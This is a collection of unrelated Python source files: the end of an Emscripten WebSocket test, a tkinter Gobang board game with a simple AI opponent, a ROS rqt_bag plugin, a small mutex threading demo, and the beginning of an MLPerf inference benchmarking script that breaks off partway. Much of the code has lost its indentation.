if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
# Test against a Websockified server with compile time configured WebSocket subprotocol. We use a Websockified
      # server because, as long as the subprotocol list contains binary, it will configure itself to accept binary data.
# This test also checks that the connect url contains the correct subprotocols.
print("\nTesting compile time WebSocket configuration.\n")
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 59166)
]:
with harness:
self.run_process([EMCC, '-Werror', path_from_root('tests', 'sockets', 'test_sockets_echo_client.c'), '-o', 'client.js', '-s', 'SOCKET_DEBUG=1', '-s', 'WEBSOCKET_SUBPROTOCOL="base64, binary"', '-DSOCKK=59166'], stdout=PIPE, stderr=PIPE)
out = self.run_js('client.js')
self.assertContained('do_msg_read: read 14 bytes', out)
self.assertContained(['connect: ws://127.0.0.1:59166, base64,binary', 'connect: ws://127.0.0.1:59166/, base64,binary'], out)
# Test against a Websockified server with runtime WebSocket configuration. We specify both url and subprotocol.
# In this test we have *deliberately* used the wrong port '-DSOCKK=12345' to configure the echo_client.c, so
# the connection would fail without us specifying a valid WebSocket URL in the configuration.
print("\nTesting runtime WebSocket configuration.\n")
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 59168)
]:
with harness:
open(os.path.join(self.get_dir(), 'websocket_pre.js'), 'w').write('''
var Module = {
websocket: {
url: 'ws://localhost:59168/testA/testB',
subprotocol: 'text, base64, binary',
}
};
''')
self.run_process([EMCC, '-Werror', path_from_root('tests', 'sockets', 'test_sockets_echo_client.c'), '-o', 'client.js', '--pre-js', 'websocket_pre.js', '-s', 'SOCKET_DEBUG=1', '-DSOCKK=12345'], stdout=PIPE, stderr=PIPE)
out = self.run_js('client.js')
self.assertContained('do_msg_read: read 14 bytes', out)
self.assertContained('connect: ws://localhost:59168/testA/testB, text,base64,binary', out)
# Test Emscripten WebSockets API to send and receive text and binary messages against an echo server.
# N.B. running this test requires 'npm install ws' in Emscripten root directory
def test_websocket_send(self):
with NodeJsWebSocketEchoServerProcess():
self.btest(path_from_root('tests', 'websocket', 'test_websocket_send.c'), expected='101', args=['-lwebsocket', '-s', 'NO_EXIT_RUNTIME=1', '-s', 'WEBSOCKET_DEBUG=1'])
# Test that native POSIX sockets API can be used by proxying calls to an intermediate WebSockets -> POSIX sockets bridge server
def test_posix_proxy_sockets(self):
# Build the websocket bridge server
self.run_process(['cmake', path_from_root('tools', 'websocket_to_posix_proxy')])
self.run_process(['cmake', '--build', '.'])
if os.name == 'nt': # This is not quite exact, instead of "isWindows()" this should be "If CMake defaults to building with Visual Studio", but there is no good check for that, so assume Windows==VS.
proxy_server = os.path.join(self.get_dir(), 'Debug', 'websocket_to_posix_proxy.exe')
else:
proxy_server = os.path.join(self.get_dir(), 'websocket_to_posix_proxy')
with BackgroundServerProcess([proxy_server, '8080']):
with PythonTcpEchoServerProcess('7777'):
# Build and run the TCP echo client program with Emscripten
self.btest(path_from_root('tests', 'websocket', 'tcp_echo_client.cpp'), expected='101', args=['-lwebsocket', '-s', 'PROXY_POSIX_SOCKETS=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
|
tk_game.py
|
import os
import re
import time
import threading
import thread_stop
from gobang import Chess
from gobang import aiChess
from gobang import dicttoChees
import tkinter as tk
import tkinter.messagebox
import tkinter.filedialog
from PIL import ImageTk, Image
times = int(time.time())
# Load the resource folders
base_folder = os.path.dirname(__file__)
source_folder = os.path.join(base_folder, 'source')
img_folder = os.path.join(source_folder, 'img')
ex_folder = os.path.join(source_folder, 'ex')
root = tk.Tk()
# Set the window title
root.title("简单的python五子棋")
# Set the window icon
root.iconphoto(False, tk.PhotoImage(file=os.path.join(img_folder, 'icon.png')))
# Define the window width and height
WIDTH = 900
HEIGHT = 667
# Define the board grid (cell length and start offset)
LENGTH = 44
START = 22
# Fix the window size
root.minsize(WIDTH, HEIGHT)
root.maxsize(WIDTH, HEIGHT)
# Option flags
order_checkbutton_var = tk.IntVar()
order = False
putlist_checkbutton_var = tk.IntVar()
putlist = False
# Create the canvas
canvas = tk.Canvas(root,
width=WIDTH,
height=HEIGHT,
bd=0,
highlightthickness=0)
# Set the background image
background = ImageTk.PhotoImage(
Image.open(os.path.join(img_folder, 'background_c.png')))
canvas.create_image(0, 0, anchor='nw', image=background)
canvas.pack()
# /////////////// #
#    Main body    #
# /////////////// #
def game_exit():
    # Quit the game
if tkinter.messagebox.askyesno('退出游戏提示', '要退出游戏吗?'):
os._exit(0)
def open_gs():
    # Open a game record file TODO
gs_file = tkinter.filedialog.askopenfilename(title="选择棋谱",
initialdir=ex_folder,
filetypes=[("棋谱文件", ".sgf"),
("棋谱文件", ".gbs"),
("Gobang棋谱文件",
".gbs")])
if gs_file != '':
try:
with open(gs_file, encoding='utf-8') as f:
gs_text = f.read()
except UnicodeDecodeError:
with open(gs_file) as f:
gs_text = f.read()
finally:
step_dict = {}
step_list = re.findall(r"[\[']([a-z][a-z])['\]]", gs_text)
for i in range(len(step_list)):
step_dict[i + 1] = step_list[i]
score_mode(step_dict)
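# Illustrative note (hypothetical inputs): the regex above extracts every two-letter move
# token, so both "[hh][ii]" (sgf-style) and "{1: 'hh', 2: 'ii'}" (the str(dict) written by
# save_gbs below) yield ['hh', 'ii'], which is then re-numbered into {1: 'hh', 2: 'ii'}
# before being handed to score_mode().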
def save_gbs():
    # Save the game record in `gbs` format
gbs_data = tkinter.filedialog.asksaveasfile(mode='w',
title="选择棋谱",
initialdir=ex_folder,
defaultextension=".espace",
filetypes=[("Gobang棋谱文件",
".gbs")])
if gbs_data is not None:
gbs_data.write(str(Chess.getStep()))
def click(event):
if not w.isWin() and not b.isWin():
ismove_x = False
ismove_y = False
if 10 < event.x < 650 and 10 < event.y < 650:
if (event.x - START) % LENGTH < 20:
x = (event.x - START) // LENGTH
ismove_x = True
elif (event.x - START) % LENGTH > 24:
x = ((event.x - START) // LENGTH) + 1
ismove_x = True
if (event.y - START) % LENGTH < 20:
y = (event.y - START) // LENGTH
ismove_y = True
elif (event.y - START) % LENGTH > 24:
y = ((event.y - START) // LENGTH) + 1
ismove_y = True
if ismove_x and ismove_y:
move(y, x)
def move(y, x):
    # Place a stone
global times
if not w.isWin() and not b.isWin():
if w.isPlayer():
if w.moveChessmen(y, x):
draw()
elif b.isPlayer():
if b.moveChessmen(y, x):
draw()
if w.isWin():
tkinter.messagebox.showinfo('提示', '白方获胜!')
if b.isWin():
tkinter.messagebox.showinfo('提示', '黑方获胜!')
def draw(step_dict=None):
    # Redraw the stones on the board
canvas.delete('Piece')
color = {1: 'black', 0: 'white'}
if step_dict is None:
step_dict = Chess.getStep().copy()
for step in step_dict.items():
row = ord(step[1][0]) - 97
column = ord(step[1][1]) - 97
y1 = START + (LENGTH * row) - 20
x1 = START + (LENGTH * column) - 20
y2 = START + (LENGTH * row) + 20
x2 = START + (LENGTH * column) + 20
canvas.create_oval(x1,
y1,
x2,
y2,
fill=color[(step[0] % 2)],
tags='Piece')
if step[0] == len(step_dict.items()):
canvas.create_oval(x1 + 15,
y1 + 15,
x2 - 15,
y2 - 15,
fill='pink',
tags='Piece')
if order:
canvas.create_text(x1 + 20,
y1 + 20,
text=str(step[0]),
fill=color[int(not bool((step[0] % 2)))],
tags='Piece')
    # print(draw_list)  # debug output
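    # Illustrative note on the geometry above (derived from START=22 and LENGTH=44): a step
    # such as 'hh' maps to row = col = ord('h') - 97 = 7, so its stone occupies the square
    # from (x1, y1) = (310, 310) to (x2, y2) = (350, 350), i.e. a 40 px circle centred on
    # the grid point at 22 + 7 * 44 = 330.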
def regret():
if len(Chess.step) != 0:
if b.isPlayer():
if w.regret():
draw()
elif w.isPlayer():
if b.regret():
draw()
def tips():
    # Hint: let the AI play a move
if len(Chess.getStep().items()) == 0:
b.moveChessmen(7, 7)
# elif not M:
else:
rc = aiChess()
move(rc[0], rc[1])
draw()
def new():
    # Start a new game
if tkinter.messagebox.askyesno('重新开始', '要重新开始游戏吗?'):
Chess.new()
draw()
def sign(event):
    # Track the mouse position and show a placement hint
# time.sleep(0.08)
canvas.delete("Sign")
ismove_x = False
ismove_y = False
if 10 < event.x < 650 and 10 < event.y < 650 and not w.isWin(
) and not b.isWin():
if (event.x - START) % LENGTH < 20:
x = (event.x - START) // LENGTH
ismove_x = True
elif (event.x - START) % LENGTH > 24:
x = ((event.x - START) // LENGTH) + 1
ismove_x = True
if (event.y - START) % LENGTH < 20:
y = (event.y - START) // LENGTH
ismove_y = True
elif (event.y - START) % LENGTH > 24:
y = ((event.y - START) // LENGTH) + 1
ismove_y = True
if ismove_x and ismove_y:
y1 = START + (LENGTH * y) - 20
x1 = START + (LENGTH * x) - 20
y2 = START + (LENGTH * y) + 20
x2 = START + (LENGTH * x) + 20
canvas.create_oval(x1 + 15,
y1 + 15,
x2 - 15,
y2 - 15,
fill='red',
tags='Sign')
def show_order():
    # Toggle display of move numbers
global order
order = bool(order_checkbutton_var.get())
draw()
def show_putlist():
    # Toggle log output
global putlist
putlist = bool(putlist_checkbutton_var.get())
def c_s():
    # Track the mouse position and show a placement hint
canvas.bind("<Motion>", sign)
    # Place a stone on click
canvas.bind("<ButtonRelease-1>", click)
def score_mode(step_dict):
canvas.delete('ButtonScore')
temp_dict = step_dict.copy()
Chess.new()
dicttoChees(step_dict)
draw()
def forward():
        # Next move
if len(temp_dict) != len(step_dict):
temp_dict.update(
{len(temp_dict) + 1: step_dict[len(temp_dict) + 1]})
dicttoChees(temp_dict)
draw()
def retreat():
        # Previous move
if len(temp_dict) != 0:
temp_dict.popitem()
dicttoChees(temp_dict)
draw()
def play():
def stop():
thread_stop.stop_thread(t)
regret_button = tk.Button(root, text='⏩', command=play)
canvas.create_window(767,
370,
anchor='nw',
width=30,
height=30,
window=regret_button,
tags='ScoreMode')
regret_button = tk.Button(root, text='⏸', command=stop)
canvas.create_window(767,
370,
anchor='nw',
width=30,
height=30,
window=regret_button,
tags='ScoreMode')
nonlocal temp_dict
if len(temp_dict) == len(step_dict):
temp_dict = {}
def play_t():
for i in range(len(step_dict) - len(temp_dict)):
forward()
time.sleep(1)
regret_button = tk.Button(root, text='⏩', command=play)
canvas.create_window(767,
370,
anchor='nw',
width=30,
height=30,
window=regret_button,
tags='ScoreMode')
t = threading.Thread(target=play_t)
t.start()
regret_button = tk.Button(root, text='◀', command=retreat)
canvas.create_window(720,
370,
anchor='nw',
width=30,
height=30,
window=regret_button,
tags='ScoreMode')
regret_button = tk.Button(root, text='⏩', command=play)
canvas.create_window(767,
370,
anchor='nw',
width=30,
height=30,
window=regret_button,
tags='ScoreMode')
regret_button = tk.Button(root, text='▶', command=forward)
canvas.create_window(810,
370,
anchor='nw',
width=30,
height=30,
window=regret_button,
tags='ScoreMode')
    # Back to the main menu
return_button = tk.Button(root, text='返回主菜单', command=button_main)
canvas.create_window(720,
500,
anchor='nw',
width=120,
height=50,
window=return_button,
tags='ButtonScore')
def Test__():
    # Save test
canvas.delete('ButtonMain')
def button_score():
    # Initialize
c_s()
Chess.new()
draw()
canvas.delete('ButtonMain')
    # New game
open_gs_button = tk.Button(root, text='新局', command=new)
canvas.create_window(720,
100,
anchor='nw',
width=120,
height=50,
window=open_gs_button,
tags='ButtonScore')
    # Load a game record
open_gs_button = tk.Button(root, text='载入棋谱', command=open_gs)
canvas.create_window(720,
190,
anchor='nw',
width=120,
height=50,
window=open_gs_button,
tags='ButtonScore')
    # Undo a move
regret_button = tk.Button(root, text='悔棋', command=regret)
canvas.create_window(720,
280,
anchor='nw',
width=120,
height=50,
window=regret_button,
tags='ButtonScore')
    # Save the game record
save_gbs_button = tk.Button(root, text='保存棋谱', command=save_gbs)
canvas.create_window(720,
370,
anchor='nw',
width=120,
height=50,
window=save_gbs_button,
tags='ButtonScore')
    # Back to the main menu
return_button = tk.Button(root, text='返回主菜单', command=button_main)
canvas.create_window(720,
500,
anchor='nw',
width=120,
height=50,
window=return_button,
tags='ButtonScore')
def detector():
while True:
if len(w.getStep()) < len(b.getStep()) and not w.isWin() and not b.isWin():
tips()
def button_m():
    # Human-vs-computer menu
c_s()
Chess.new()
draw()
global auto
auto = threading.Thread(target=detector)
auto.start()
canvas.delete('ButtonMain')
    # New game
open_gs_button = tk.Button(root, text='新局', command=new)
canvas.create_window(720,
100,
anchor='nw',
width=120,
height=50,
window=open_gs_button,
tags='ButtonM')
    # Undo a move
regret_button = tk.Button(root, text='悔棋', command=regret)
canvas.create_window(720,
190,
anchor='nw',
width=120,
height=50,
window=regret_button,
tags='ButtonM')
    # Hint
tips_button = tk.Button(root, text='提示', command=tips)
canvas.create_window(720,
280,
anchor='nw',
width=120,
height=50,
window=tips_button,
tags='ButtonM')
    # Save the game record
save_gbs_button = tk.Button(root, text='保存棋谱', command=save_gbs)
canvas.create_window(720,
370,
anchor='nw',
width=120,
height=50,
window=save_gbs_button,
tags='ButtonM')
    # Back to the main menu
return_button = tk.Button(root, text='返回主菜单', command=button_main)
canvas.create_window(720,
460,
anchor='nw',
width=120,
height=50,
window=return_button,
tags='ButtonM')
def button_main():
    # Main menu
canvas.delete('ButtonScore')
canvas.delete('ButtonM')
canvas.delete('ScoreMode')
    # Unbind events
canvas.unbind("<ButtonRelease-1>")
canvas.unbind("<Motion>")
try:
thread_stop.stop_thread(auto)
except:
pass
    # Human-vs-computer button
man_machine_button = tk.Button(root, text='人机对战', command=button_m)
canvas.create_window(720,
100,
anchor='nw',
width=120,
height=50,
window=man_machine_button,
tags='ButtonMain')
    # Replay (game record) mode button
score_button = tk.Button(root, text='打谱模式', command=button_score)
canvas.create_window(720,
190,
anchor='nw',
width=120,
height=50,
window=score_button,
tags='ButtonMain')
    # Quit game button
game_exit_button = tk.Button(root, text='退出游戏', command=game_exit)
canvas.create_window(720,
280,
anchor='nw',
width=120,
height=50,
window=game_exit_button,
tags='ButtonMain')
    # Test button
# debug_button = tk.Button(root, text='测试按钮', command=Test__)
# canvas.create_window(720,
# 460,
# anchor='nw',
# width=120,
# height=50,
# window=debug_button,
# tags='ButtonMain')
b = Chess('b', player_name="Computer.Python.AI", can_regret=True)
w = Chess('w', player_name="Computer.Python.AI", can_regret=True)
order_checkbutton = tk.Checkbutton(root,
text="显示序号",
variable=order_checkbutton_var,
onvalue=1,
offvalue=0,
height=5,
width=20,
command=show_order)
canvas.create_window(667,
617,
anchor='nw',
width=120,
height=50,
window=order_checkbutton,
tags='Checkbutton')
putlist_checkbutton = tk.Checkbutton(root,
text="输出LOG",
variable=putlist_checkbutton_var,
onvalue=1,
offvalue=0,
height=5,
width=20,
command=show_putlist)
canvas.create_window(787,
617,
anchor='nw',
width=120,
height=50,
window=putlist_checkbutton,
tags='Checkbutton')
button_main()
# Confirm before closing the window
root.protocol("WM_DELETE_WINDOW", game_exit)
root.mainloop()
|
bag.py
|
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import os
import argparse
import threading
from qt_gui.plugin import Plugin
from .bag_widget import BagWidget
class Bag(Plugin):
"""
    Subclass of Plugin to provide interactive bag visualization, playing (publishing) and recording
"""
def __init__(self, context):
"""
:param context: plugin context hook to enable adding widgets as a ROS_GUI pane, ''PluginContext''
"""
super(Bag, self).__init__(context)
self.setObjectName('Bag')
args = self._parse_args(context.argv())
self._widget = BagWidget(context, args.clock)
if context.serial_number() > 1:
self._widget.setWindowTitle(
self._widget.windowTitle() + (' (%d)' % context.serial_number()))
context.add_widget(self._widget)
def load_bags():
for bagfile in args.bagfiles:
self._widget.load_bag(bagfile)
load_thread = threading.Thread(target=load_bags)
load_thread.start()
def _parse_args(self, argv):
parser = argparse.ArgumentParser(prog='rqt_bag', add_help=False)
Bag.add_arguments(parser)
return parser.parse_args(argv)
@staticmethod
def _isfile(parser, arg):
if os.path.isfile(arg):
return arg
else:
parser.error("Bag file %s does not exist" % (arg))
@staticmethod
def add_arguments(parser):
group = parser.add_argument_group('Options for rqt_bag plugin')
group.add_argument('--clock', action='store_true', help='publish the clock time')
group.add_argument('bagfiles', type=lambda x: Bag._isfile(parser, x),
nargs='*', default=[], help='Bagfiles to load')
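    # Illustrative note (hypothetical invocation): argv like ['--clock', 'my_recording.bag']
    # yields args.clock == True and args.bagfiles == ['my_recording.bag'], provided the file
    # exists; otherwise _isfile() reports a parser error.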
def shutdown_plugin(self):
self._widget.shutdown_all()
def save_settings(self, plugin_settings, instance_settings):
# TODO implement saving
# instance_settings.set_value(k, v)
pass
def restore_settings(self, plugin_settings, instance_settings):
# TODO implement restoring
# v = instance_settings.value(k)
pass
# def trigger_configuration(self):
# TODO move some of the button functionality to config button if it is "more configy"
|
main_2.py
|
from threading import Thread, Semaphore
class Mutex:
def __init__(self):
self._token = Semaphore()
def __enter__(self):
self._token.acquire()
def __exit__(self, _1, _2, _3):
self._token.release()
count = 0
mu = Mutex()
def worker_a():
global count
with mu:
count += 1
def worker_b():
global count
with mu:
count += 1
a = Thread(target=worker_a)
b = Thread(target=worker_b)
a.start()
b.start()
a.join()
b.join()
print(count)
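# Illustrative note (not executed above): Semaphore() defaults to a count of one, so the
# Mutex wrapper behaves as a binary lock; under that assumption the standard-library
# primitive would be an equivalent drop-in:
#
#     from threading import Lock
#     mu = Lock()  # supports the same `with mu:` usage as Mutex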
|
main.py
|
"""
mlperf inference benchmarking tool
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import array
import collections
import json
import logging
import os
import sys
import threading
import time
from queue import Queue
import mlperf_loadgen as lg
import numpy as np
import dataset
import imagenet
import coco
import re
logging.basicConfig(level=logging.INFO)
log = logging.getLogger("main")
NANO_SEC = 1e9
MILLI_SEC = 1000
# pylint: disable=missing-docstring
# the datasets we support
SUPPORTED_DATASETS = {
"imagenet":
(imagenet.Imagenet, dataset.pre_process_vgg, dataset.PostProcessCommon(offset=-1),
{"image_size": [224, 224, 3]}),
"imagenet_mobilenet":
(imagenet.Imagenet, dataset.pre_process_mobilenet, dataset.PostProcessArgMax(offset=-1),
{"image_size": [224, 224, 3]}),
"imagenet_pytorch":
(imagenet.Imagenet, dataset.pre_process_imagenet_pytorch, dataset.PostProcessArgMax(offset=0),
{"image_size": [224, 224, 3]}),
"coco-300":
(coco.Coco, dataset.pre_process_coco_mobilenet, coco.PostProcessCoco(),
{"image_size": [300, 300, 3]}),
"coco-300-pt":
(coco.Coco, dataset.pre_process_coco_pt_mobilenet, coco.PostProcessCocoPt(False,0.3),
{"image_size": [300, 300, 3]}),
"coco-1200":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCoco(),
{"image_size": [1200, 1200, 3]}),
"coco-1200-onnx":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoOnnx(),
{"image_size": [1200, 1200, 3]}),
"coco-1200-pt":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoPt(True,0.05),
{"image_size": [1200, 1200, 3],"use_label_map": True}),
"coco-1200-tf":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoTf(),
{"image_size": [1200, 1200, 3],"use_label_map": False}),
}
# Pre-defined command line options to simplify things. They are used as defaults and can be
# overridden from the command line.
SUPPORTED_PROFILES = {
"defaults": {
"dataset": "imagenet",
"backend": "tensorflow",
"cache": 0,
"max-batchsize": 32,
},
# resnet
"resnet50-tf": {
"inputs": "input_tensor:0",
"outputs": "ArgMax:0",
"dataset": "imagenet",
"backend": "tensorflow",
"model-name": "resnet50",
},
"resnet50-onnxruntime": {
"dataset": "imagenet",
"outputs": "ArgMax:0",
"backend": "onnxruntime",
"model-name": "resnet50",
},
# mobilenet
"mobilenet-tf": {
"inputs": "input:0",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"dataset": "imagenet_mobilenet",
"backend": "tensorflow",
"model-name": "mobilenet",
},
"mobilenet-onnxruntime": {
"dataset": "imagenet_mobilenet",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"backend": "onnxruntime",
"model-name": "mobilenet",
},
# ssd-mobilenet
"ssd-mobilenet-tf": {
"inputs": "image_tensor:0",
"outputs": "num_detections:0,detection_boxes:0,detection_scores:0,detection_classes:0",
"dataset": "coco-300",
"backend": "tensorflow",
"model-name": "ssd-mobilenet",
},
"ssd-mobilenet-pytorch": {
"inputs": "image",
"outputs": "bboxes,labels,scores",
"dataset": "coco-300-pt",
"backend": "pytorch-native",
"model-name": "ssd-mobilenet",
},
"ssd-mobilenet-onnxruntime": {
"dataset": "coco-300",
"outputs": "num_detections:0,detection_boxes:0,detection_scores:0,detection_classes:0",
"backend": "onnxruntime",
"data-format": "NHWC",
"model-name": "ssd-mobilenet",
},
# ssd-resnet34
"ssd-resnet34-tf": {
"inputs": "image:0",
"outputs": "detection_bboxes:0,detection_classes:0,detection_scores:0",
"dataset": "coco-1200-tf",
"backend": "tensorflow",
"data-format": "NCHW",
"model-name": "ssd-resnet34",
},
"ssd-resnet34-pytorch": {
"inputs": "image",
"outputs": "bboxes,labels,scores",
"dataset": "coco-1200-pt",
"backend": "pytorch-native",
"model-name": "ssd-resnet34",
},
"ssd-resnet34-onnxruntime": {
"dataset": "coco-1200-onnx",
"inputs": "image",
"outputs": "bboxes,labels,scores",
"backend": "onnxruntime",
"data-format": "NCHW",
"max-batchsize": 1,
"model-name": "ssd-resnet34",
},
"ssd-resnet34-onnxruntime-tf": {
"dataset": "coco-1200-tf",
"inputs": "image:0",
"outputs": "detection_bboxes:0,detection_classes:0,detection_scores:0",
"backend": "onnxruntime",
"data-format": "NHWC",
"model-name": "ssd-resnet34",
},
}
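# A minimal sketch (hypothetical helper, not used elsewhere in this file) of how a profile
# is layered over the "defaults" entry; get_args() below performs the same merge before
# applying any command-line overrides.
def _resolve_profile_example(profile_name):
    resolved = dict(SUPPORTED_PROFILES["defaults"])
    resolved.update(SUPPORTED_PROFILES.get(profile_name, {}))
    # e.g. "resnet50-tf" keeps cache/max-batchsize from the defaults and adds the
    # dataset, backend, inputs, outputs and model-name entries from the profile
    return resolved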
SCENARIO_MAP = {
"SingleStream": lg.TestScenario.SingleStream,
"MultiStream": lg.TestScenario.MultiStream,
"Server": lg.TestScenario.Server,
"Offline": lg.TestScenario.Offline,
}
last_timeing = []
def get_args():
"""Parse commandline."""
parser = argparse.ArgumentParser()
parser.add_argument('--tune', dest='tune', action='store_true',
help='tune best int8 model on calibration dataset')
parser.add_argument("--dataset", choices=SUPPORTED_DATASETS.keys(), help="dataset")
parser.add_argument("--dataset-path", required=True, help="path to the dataset")
parser.add_argument("--dataset-list", help="path to the dataset list")
parser.add_argument("--data-format", choices=["NCHW", "NHWC"], help="data format")
parser.add_argument("--profile", choices=SUPPORTED_PROFILES.keys(), help="standard profiles")
parser.add_argument("--scenario", default="SingleStream",
help="mlperf benchmark scenario, one of " + str(list(SCENARIO_MAP.keys())))
parser.add_argument("--max-batchsize", type=int, help="max batch size in a single inference")
parser.add_argument("--model", required=True, help="model file")
parser.add_argument("--output", default="output", help="test results")
parser.add_argument("--inputs", help="model inputs")
parser.add_argument("--outputs", help="model outputs")
parser.add_argument("--backend", help="runtime to use")
    parser.add_argument("--model-name", help="name of the mlperf model, e.g. resnet50")
parser.add_argument("--threads", default=os.cpu_count(), type=int, help="threads")
parser.add_argument("--qps", type=int, help="target qps")
parser.add_argument("--cache", type=int, default=0, help="use cache")
parser.add_argument("--accuracy", action="store_true", help="enable accuracy pass")
parser.add_argument("--find-peak-performance", action="store_true", \
help="enable finding peak performance pass")
parser.add_argument("--debug", action="store_true", help="debug, turn traces on")
# file to use mlperf rules compliant parameters
parser.add_argument("--mlperf_conf", default="../../../../utils/MLPerf/mlperf.conf", \
help="mlperf rules config")
# file for user LoadGen settings such as target QPS
parser.add_argument("--user_conf", default="user.conf", \
help="user config for user LoadGen settings such as target QPS")
# below will override mlperf rules compliant settings - don't use for official submission
parser.add_argument("--time", type=int, help="time to scan in seconds")
parser.add_argument("--count", type=int, help="dataset items to use")
    parser.add_argument("--max-latency", type=float, help="mlperf max latency in seconds at the target percentile")
parser.add_argument("--samples-per-query", type=int, help="mlperf multi-stream sample per query")
parser.add_argument('--benchmark', dest='benchmark', action='store_true',
help='run benchmark')
parser.add_argument('--int8', dest='int8', action='store_true', help='run benchmark')
parser.add_argument("--tuned_checkpoint", default='./saved_results', type=str, metavar='PATH',
help='path to checkpoint tuned by Low Precision Optimization Tool (default: ./)')
args = parser.parse_args()
# don't use defaults in argparser. Instead we default to a dict, override that with a profile
    # and take this as the default unless the command line overrides it
defaults = SUPPORTED_PROFILES["defaults"]
if args.profile:
profile = SUPPORTED_PROFILES[args.profile]
defaults.update(profile)
for k, v in defaults.items():
kc = k.replace("-", "_")
if getattr(args, kc) is None:
setattr(args, kc, v)
if args.inputs:
args.inputs = args.inputs.split(",")
if args.outputs:
args.outputs = args.outputs.split(",")
if args.scenario not in SCENARIO_MAP:
        parser.error("valid scenarios: " + str(list(SCENARIO_MAP.keys())))
return args
def get_backend(backend):
if backend == "tensorflow":
from backend_tf import BackendTensorflow
backend = BackendTensorflow()
elif backend == "onnxruntime":
from backend_onnxruntime import BackendOnnxruntime
backend = BackendOnnxruntime()
elif backend == "null":
from backend_null import BackendNull
backend = BackendNull()
elif backend == "pytorch":
from backend_pytorch import BackendPytorch
backend = BackendPytorch()
elif backend == "pytorch-native":
from backend_pytorch_native import BackendPytorchNative
backend = BackendPytorchNative()
elif backend == "tflite":
from backend_tflite import BackendTflite
backend = BackendTflite()
else:
raise ValueError("unknown backend: " + backend)
return backend
class Item:
"""An item that we queue for processing by the thread pool."""
def __init__(self, query_id, content_id, img, label=None):
self.query_id = query_id
self.content_id = content_id
self.img = img
self.label = label
self.start = time.time()
class RunnerBase:
def __init__(self, model, ds, threads, post_proc=None, max_batchsize=128):
self.take_accuracy = False
self.ds = ds
self.model = model
self.post_process = post_proc
self.threads = threads
self.take_accuracy = False
self.max_batchsize = max_batchsize
self.result_timing = []
def handle_tasks(self, tasks_queue):
pass
def start_run(self, result_dict, take_accuracy):
self.result_dict = result_dict
self.result_timing = []
self.take_accuracy = take_accuracy
self.post_process.start()
def run_one_item(self, qitem):
# run the prediction
processed_results = []
try:
results = self.model.predict({self.model.inputs[0]: qitem.img})
processed_results = self.post_process(results, qitem.content_id, qitem.label, self.result_dict)
if self.take_accuracy:
self.post_process.add_results(processed_results)
self.result_timing.append(time.time() - qitem.start)
except Exception as ex: # pylint: disable=broad-except
src = [self.ds.get_item_loc(i) for i in qitem.content_id]
log.error("thread: failed on contentid=%s, %s", src, ex)
# since post_process will not run, fake empty responses
processed_results = [[]] * len(qitem.query_id)
finally:
response_array_refs = []
response = []
for idx, query_id in enumerate(qitem.query_id):
response_array = array.array("B", np.array(processed_results[idx], np.float32).tobytes())
response_array_refs.append(response_array)
bi = response_array.buffer_info()
response.append(lg.QuerySampleResponse(query_id, bi[0], bi[1]))
lg.QuerySamplesComplete(response)
def enqueue(self, query_samples):
idx = [q.index for q in query_samples]
query_id = [q.id for q in query_samples]
if len(query_samples) < self.max_batchsize:
data, label = self.ds.get_samples(idx)
self.run_one_item(Item(query_id, idx, data, label))
else:
bs = self.max_batchsize
for i in range(0, len(idx), bs):
data, label = self.ds.get_samples(idx[i:i+bs])
self.run_one_item(Item(query_id[i:i+bs], idx[i:i+bs], data, label))
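    # e.g. with the default max_batchsize=128, a 300-sample query above is processed as
    # three Items of 128, 128 and 44 samples.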
def finish(self):
pass
class QueueRunner(RunnerBase):
def __init__(self, model, ds, threads, post_proc=None, max_batchsize=128):
super().__init__(model, ds, threads, post_proc, max_batchsize)
self.tasks = Queue(maxsize=threads * 4)
self.workers = []
self.result_dict = {}
for _ in range(self.threads):
worker = threading.Thread(target=self.handle_tasks, args=(self.tasks,))
worker.daemon = True
self.workers.append(worker)
worker.start()
def handle_tasks(self, tasks_queue):
"""Worker thread."""
while True:
qitem = tasks_queue.get()
if qitem is None:
                # None in the queue indicates the parent wants us to exit
tasks_queue.task_done()
break
self.run_one_item(qitem)
tasks_queue.task_done()
def enqueue(self, query_samples):
idx = [q.index for q in query_samples]
query_id = [q.id for q in query_samples]
if len(query_samples) < self.max_batchsize:
data, label = self.ds.get_samples(idx)
self.tasks.put(Item(query_id, idx, data, label))
else:
